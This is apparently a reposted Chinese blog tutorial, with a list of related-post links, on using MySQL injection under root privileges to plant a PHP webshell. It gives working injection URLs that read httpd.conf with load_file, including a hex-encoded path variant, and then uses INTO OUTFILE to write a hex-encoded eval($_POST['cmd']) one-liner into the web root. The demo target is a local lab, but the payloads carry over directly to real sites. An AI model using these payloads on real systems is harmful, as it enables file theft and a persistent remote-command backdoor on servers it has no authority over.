mysql注入写一句话_Mysql注入root权限直接写一句话马
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来
http://localhost/pentest/sql/sql_injection_get.php?id=1
发现是root权限,我们尝试直接写马
首先要找到网站的主目录:
数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\
进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf
http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,3 load_file(‘D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf‘) from user--+
如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)
找到了网站目录:D:/wamp/www
我们尝试写:
http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile ‘D:/wamp/www/xx.php‘ from user --+
<?php eval($_POST[‘cmd‘]);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E
然后访问:http://localhost/xx.php
原文:http://www.cnblogs.com/BloodZero/p/4432549.html
mysql注入写一句话_Mysql注入root权限直接写一句话马相关推荐
- mysql root 被锁_MySQL的root权限密码忘记的解决办法
今天是我第一次用MySQL这个软件,我在自己的系统中安装了一个(OS X ),在虚拟机中的windows XP 环境下安装了一个,我希望能在我自己的系统下远程连接到XP 中的MySQL,于是XP环境下 ...
- mysql root 权限注入_Mysql注入root权限直接写一句话马
标签: 首先我们的找到一个有注入的站:这里我用自己搭建的环境表示:大家不要乱来 http://localhost/pentest/sql/sql_injection_get.php?id=1 发现是r ...
- mysql进行mof提权_MySQL数据库Root权限MOF方法提权研究
MySQL数据库Root权限MOF方法提权研究 MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Wi ...
- mysql root 提权_mysql以ROOT权限提权方法
mysql .x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内. 按照上面的方法,我们需要知道web ...
- mysql 远程登陆设置_MYSQL远程登录权限设置
Mysql默认关闭远程登录权限,如下操作允许用户在任意地点登录: 1. 进入mysql,GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY ...
- linux通过java获取root权限_通过可写文件获取Linux root权限的5种方法
Linux系统中,全部都是以文件形式存在的,包括目录.设备都是有权限的,共有读.写.可执行三种.管理员为文件设置好权限后,应该要考虑哪些Linux用户会被允许和限制上述的三个权限. 通过可写脚本进行r ...
- linux中root权限找tmp路径,通过可写文件获取 Linux root 权限的 5 种方法-tmp文件
Linux系统中,全部都是以文件形式存在的,包括目录.设备都是有权限的,共有读.写.可执行三种.管理员为文件设置好权限后,应该要考虑哪些Linux用户会被允许和限制上述的三个权限. 通过可写脚本进行r ...
- mysql注入找路径_MySQL注入(示例代码)
---------------------------------------------------------------------------------------------------- ...
- mysql注入技巧原理_MySQL注入技巧总结
0x00 介绍 以下所有技巧都只在mysql适用,因为它太灵活了. 0x01 MYSQl灵活的语法 1 MySQL语法以及认证绕过 注释符: #,-- X(X为任意字符)/*(MySQL-5.1);% ...
最新文章
- python(1):数据类型/string/list/dict/set等
- 按钮自动居中布局_CSS布局技巧
- AI算法连载02:概率论基础
- 关于 C++ 中输入输出的猜想
- 回公司无聊和小冰聊天,很好奇她到底怎么想的
- Django链接Mysql 8.0 出现错误(1045:Access denied for user ‘root‘@‘localhost‘ (using password: NO) 的一种解决方法
- php移动文件的函数 move_uploaded_file()和copy
- android客户端功能,人人网Android版手机客户端功能详解
- 如何在EF中实现left join(左联接)查询
- 50件关于学霸与学渣的小事
- YXC | 蓝牙耳机晶振怎么选?
- 【rabbitMQ】真就一篇就够!!
- JAVA NIO实现客户端与服务端通信
- openssl 交叉编译 armv7内核
- dcs常用的冗余方式_dcs试题
- 真 OO无双之真乱舞书 序言
- 个人征信报告解析(机构版)
- ArcGIS Pro基于遥感影像使用深度学习地物识别评估植被健康情况(教程)
- Linux命令之关机命令
- 20-交换技术——Trunk技术详解
热门文章
- SVN Error:请求的名称有效并且在数据库中找到,但是它没有相关的正确的数据来被解析...
- c#组元(Tuple)的使用
- WCF4.0 –- RESTful WCF Services (1) (入门)
- C#动态生成html页
- SQL语句中用Parameters有什么好处
- 处理unsigned相减错误(BIGINT UNSIGNED value is out of range)
- php soap实例讲解
- Redis与Memcached的比较
- PHP之composer切换国内源
- Linux的Vi编辑器